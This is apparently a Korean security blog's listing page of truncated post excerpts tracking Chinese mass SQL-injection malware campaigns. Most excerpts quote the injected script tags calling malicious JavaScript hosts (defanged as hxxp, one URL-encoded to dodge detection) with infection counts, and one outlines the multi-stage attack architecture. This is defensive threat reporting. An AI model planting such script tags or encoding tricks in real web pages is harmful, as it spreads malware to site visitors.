헐랭이와 IT보안 (opt9's IT Security)

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. <script src=hxxp://sb.5252.ws:88/107/1.js></script> Googling: 40,400 개 KR 도메인: 0 개 미차단 1.js -> hx...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. <script src=hxxp://www.killwow1.cn/g.js></script> 삽입 사례 등장 Googling: 40 개, KR 도메인: 2 개, 미차단 g.js -&g...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.이 공격에 봇넷 사업자들도 뛰어들었음.<script src=hxxp://free.hostpinoy.info/f.js></script>Googling : 230,000 개, KR도메인 : ...

최근 벌어지는 중국발 SQL 삽입 악성코드 공격은 공격 기법과 탐지 패턴이 다 공개되었고, 이들이 쓰는 실탄(악성코드)까지 다 수집이 되어 있습니다. 순수하게 기술적인 측면에서만 말하자면 한물간 공격이라고 볼 수 있겠죠. 그럼에도 주말도 없이 밤샘해가면서 한물간 공격을 계속 시도하는 이유는 '서버 장악'이 목적이 아니라, 악성코드 감염을 통한 '좀...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. <script src=hxxp://www.direct84.com/7.js></script> Googling: 8 개, KR 도메인: 0 개, 미차단 7.js -> hxxp:/...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. ririwow 가 wow 를 무지하고 싶은가 보다. 솔직히 주말에는 너도 쉴 줄 알았는데, 아니었구나~ <script src=hxxp://www.wowyeye.cn/m.js></scrip...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. ririwow 가 머리를 좀 쓰고 있음. hxxp://www.ririwow.cn/ip.js 가 국내외에서 신속히 detect 되자, 패턴을 바꾸었음. <script src=hxxp://www.ri...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.<script src=hxxp://%61%31%38%38%2E%77%73/1.js></script> 로 삽입하는 사례구글링 결과 : 27,100 개, KR 도메인 : 0 개, 미차단탐지를 방해하...

SQL injection Malware Architecture전체적으로 (1) SQL 삽입 공격으로 웹 사이트에 심어놓은 Front-end JavaScript(2) 악성코드 호스팅 서버의 Middle-layer JavaScript(3) 악성코드 호스팅 서버의 Back-end JavaScript and/or Exploits(4) 최종적으로 사용자...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.중국애들이 악성코드 호스팅 서버와 자바스크립트의 이름을 다시 바꾸었습니다.<script src=hxxp://bbs.jueduizuan.com/ip.js> 로 바꾸었군요.구글에서 뒤져보면 전세계적으로 1,6...